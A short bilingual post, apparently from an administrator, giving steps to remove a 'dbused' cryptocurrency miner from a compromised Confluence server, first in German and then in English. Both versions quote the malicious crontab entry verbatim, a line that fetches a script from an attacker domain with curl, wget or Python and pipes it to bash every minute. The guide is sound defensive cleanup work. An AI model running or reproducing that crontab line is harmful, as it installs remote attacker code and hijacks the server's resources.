Kein Zugriff auf Confluence 100% CPUS Auslastung durch Prozess „dbused“ http://bash.givemexyz.in/xms

Anleitung:

Mit folgenden Schritten konnten wir den „miner“ entfernen bzw. das Problem beheben.

  1. mit SSH auf den Confluence Server verbinden
  2. mit htop die dbused-Prozesse suchen und mit kill -9 „PID“ beenden
  3. dann rm -rf /tmp/dbused
  4. dann chmod -R 000 /tmp/.pwn
  5. Anschließend die CronTabs kontrollieren und aufräumen mit Einträgen von http://bash.givemexyz.in/xms
    1. Bei uns war es die Datei: var/spool/cron/crontabs/confluence
    2. Dort stand nur ein Command drin, den wir entsprechend gelöscht haben.
      • * * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms
  6. Anschließend den Server mit reboot Neustarten.

in english

How to use:

We were able to remove the "miner" or fix the issue with the following steps.

  1. connect to the Confluence server with SSH
  2. search for the dbused processes with htop and terminate them with kill -9 "PID"
  3. then rm -rf /tmp/dbused
  4. then chmod -R 000 /tmp/.pwn
  5. Then check the CronTabs and clean up with entries from http://bash.givemexyz.in/xms.
    1. In our case it was the file: var/spool/cron/crontabs/confluence
    • There was only one command in it, which we deleted accordingly.
    • * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms
  6. Afterwards restart the server with reboot.